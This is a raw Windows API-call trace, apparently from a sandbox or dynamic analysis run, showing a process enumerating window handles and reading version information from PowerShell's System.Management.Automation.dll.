	[0279.243] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0279.243] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0279.243] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0279.243] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0279.243] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0279.244] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x460
	[0279.244] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0279.244] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0279.244] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0xaac
	[0279.244] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x3d0
	[0279.244] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x978
	[0279.244] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0xa7c
	[0279.244] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x59c
	[0279.244] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0xa88
	[0279.244] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0xa6c
	[0279.245] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0xa68
	[0279.245] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x9f8
	[0279.245] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0xa04
	[0279.246] GetWindow (hWnd=0x20204, uCmd=0x4) returned 0x0
	[0279.246] IsWindowVisible (hWnd=0x20204) returned 0
	[0279.247] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x924
	[0279.247] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x8dc
	[0279.247] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x7dc
	[0279.247] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x768
	[0279.247] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x764
	[0279.247] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x820
	[0279.247] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x810
	[0279.247] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x794
	[0279.247] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x83c
	[0279.247] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x7ac
	[0279.247] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0xb44
	[0279.248] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0xb5c
	[0279.248] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x838
	[0279.248] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0279.248] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0279.248] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0279.248] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0279.248] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0279.248] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0279.248] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0279.248] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0279.249] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x818
	[0279.249] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x5b8
	[0279.249] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x494
	[0279.249] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x1ec
	[0279.249] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x440
	[0279.249] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x7e8
	[0279.249] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x730
	[0279.249] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x2c8
	[0279.249] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x31c
	[0279.249] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x330
	[0279.250] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x128
	[0279.250] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x5c8
	[0279.250] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x6f8
	[0279.250] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x358
	[0279.250] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x73c
	[0279.250] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0xb0
	[0279.250] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x250
	[0279.250] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x240
	[0279.250] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x790
	[0279.250] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x61c
	[0279.251] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x540
	[0279.251] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x538
	[0279.251] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x568
	[0279.251] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x538
	[0279.251] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x568
	[0279.251] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x538
	[0279.251] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x540
	[0279.251] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x540
	[0279.251] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x510
	[0279.251] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x57c
	[0279.251] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x460
	[0279.252] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x554
	[0279.252] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0279.252] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x528
	[0279.252] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0279.252] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0279.252] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0279.252] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x79c
	[0279.252] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0279.252] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4e0
	[0279.252] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0279.253] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x460
	[0279.253] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x460
	[0279.253] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x44c
	[0279.253] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x778
	[0279.253] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x460
	[0279.253] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x558
	[0279.253] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0279.253] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4d0
	[0279.253] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0xb3c
	[0279.253] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0xa90
	[0279.254] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0xad0
	[0279.254] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0xa9c
	[0279.254] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0xaa0
	[0279.254] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0xb1c
	[0279.254] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x7e0
	[0279.254] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0xa74
	[0279.254] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x694
	[0279.254] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0xa28
	[0279.254] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x9b0
	[0279.255] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x8d8
	[0279.255] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x940
	[0279.255] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x93c
	[0279.255] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4ec
	[0279.255] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x150
	[0279.255] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x720
	[0279.255] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x3c4
	[0279.255] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x7d4
	[0279.255] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x6c8
	[0279.256] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0xb54
	[0279.256] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0xb54
	[0279.256] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0xb5c
	[0279.256] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x838
	[0279.256] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x818
	[0279.256] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x5b8
	[0279.256] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x494
	[0279.256] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x1ec
	[0279.257] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x440
	[0279.257] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x7e8
	[0279.257] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x730
	[0279.257] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x2c8
	[0279.257] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x31c
	[0279.257] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x330
	[0279.257] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x128
	[0279.257] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x5c8
	[0279.257] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x6f8
	[0279.257] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x358
	[0279.258] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x73c
	[0279.258] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0xb0
	[0279.258] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x250
	[0279.258] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x240
	[0279.258] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x790
	[0279.258] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x61c
	[0279.258] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x568
	[0279.258] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x538
	[0279.258] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x540
	[0279.259] GetWindowThreadProcessId (in: hWnd=0x700a4, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x510
	[0279.259] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x460
	[0279.259] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x79c
	[0279.259] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x4e0
	[0279.259] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x460
	[0279.259] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x1cd840 | out: lpdwProcessId=0x1cd840) returned 0x778
	[0279.263] WerSetFlags () returned 0x0
	[0279.270] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0279.270] CoTaskMemFree (pv=0x0) 
	[0279.271] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1cdba8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1cdba0 | out: pulNumLanguages=0x1cdba8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1cdba0) returned 1
	[0279.271] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1cdba8, pwszLanguagesBuffer=0x2bf4fe0, pcchLanguagesBuffer=0x1cdba0 | out: pulNumLanguages=0x1cdba8, pwszLanguagesBuffer=0x2bf4fe0, pcchLanguagesBuffer=0x1cdba0) returned 1
	[0279.931] CoTaskMemAlloc (cb=0x24) returned 0x2f2a60
	[0279.931] GetUserDefaultLocaleName (in: lpLocaleName=0x2f2a60, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0279.932] CoTaskMemFree (pv=0x2f2a60) 
	[0279.951] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0279.951] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0279.951] CoTaskMemFree (pv=0x2a1100) 
	[0279.953] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0279.953] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0279.953] CoTaskMemFree (pv=0x2a1100) 
	[0279.955] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0279.955] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0279.955] CoTaskMemFree (pv=0x2a1100) 
	[0279.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0279.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0279.963] SetErrorMode (uMode=0x1) returned 0x1
	[0279.963] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1cd820 | out: lpFileInformation=0x1cd820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0279.963] SetErrorMode (uMode=0x1) returned 0x1
	[0279.963] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1cda90 | out: lpdwHandle=0x1cda90) returned 0x94c
	[0280.601] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bf8870 | out: lpData=0x2bf8870) returned 1
	[0280.602] VerQueryValueW (in: pBlock=0x2bf8870, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cda08, puLen=0x1cda00 | out: lplpBuffer=0x1cda08*=0x2bf890c, puLen=0x1cda00) returned 1
	[0280.602] VerQueryValueW (in: pBlock=0x2bf8870, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1cd978, puLen=0x1cd970 | out: lplpBuffer=0x1cd978*=0x2bf89e8, puLen=0x1cd970) returned 1
	[0280.602] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0280.602] CoTaskMemAlloc (cb=0x2e) returned 0x2f51e0
	[0280.602] lstrcpyW (in: lpString1=0x2f51e0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0280.602] CoTaskMemFree (pv=0x2f51e0) 
	[0280.602] VerQueryValueW (in: pBlock=0x2bf8870, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1cd978, puLen=0x1cd970 | out: lplpBuffer=0x1cd978*=0x2bf8a3c, puLen=0x1cd970) returned 1
	[0280.602] lstrlenW (lpString="System.Management.Automation") returned 28
	[0280.602] CoTaskMemAlloc (cb=0x3c) returned 0x2fc900
	[0280.602] lstrcpyW (in: lpString1=0x2fc900, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0280.602] CoTaskMemFree (pv=0x2fc900) 
	[0280.602] VerQueryValueW (in: pBlock=0x2bf8870, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1cd978, puLen=0x1cd970 | out: lplpBuffer=0x1cd978*=0x2bf8a98, puLen=0x1cd970) returned 1
	[0280.602] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0280.602] CoTaskMemAlloc (cb=0x20) returned 0x2fa950
	[0280.602] lstrcpyW (in: lpString1=0x2fa950, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0280.602] CoTaskMemFree (pv=0x2fa950) 
	[0280.602] VerQueryValueW (in: pBlock=0x2bf8870, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1cd978, puLen=0x1cd970 | out: lplpBuffer=0x1cd978*=0x2bf8ad8, puLen=0x1cd970) returned 1
	[0280.602] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0280.602] CoTaskMemAlloc (cb=0x44) returned 0x2fc900
	[0280.602] lstrcpyW (in: lpString1=0x2fc900, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0280.602] CoTaskMemFree (pv=0x2fc900) 
	[0280.602] VerQueryValueW (in: pBlock=0x2bf8870, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1cd978, puLen=0x1cd970 | out: lplpBuffer=0x1cd978*=0x2bf8b40, puLen=0x1cd970) returned 1
	[0280.603] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0280.603] CoTaskMemAlloc (cb=0x76) returned 0x2a4220
	[0280.603] lstrcpyW (in: lpString1=0x2a4220, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0280.603] CoTaskMemFree (pv=0x2a4220) 
	[0280.603] VerQueryValueW (in: pBlock=0x2bf8870, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1cd978, puLen=0x1cd970 | out: lplpBuffer=0x1cd978*=0x2bf8bdc, puLen=0x1cd970) returned 1
	[0280.603] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0280.603] CoTaskMemAlloc (cb=0x44) returned 0x2fc900
	[0280.603] lstrcpyW (in: lpString1=0x2fc900, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
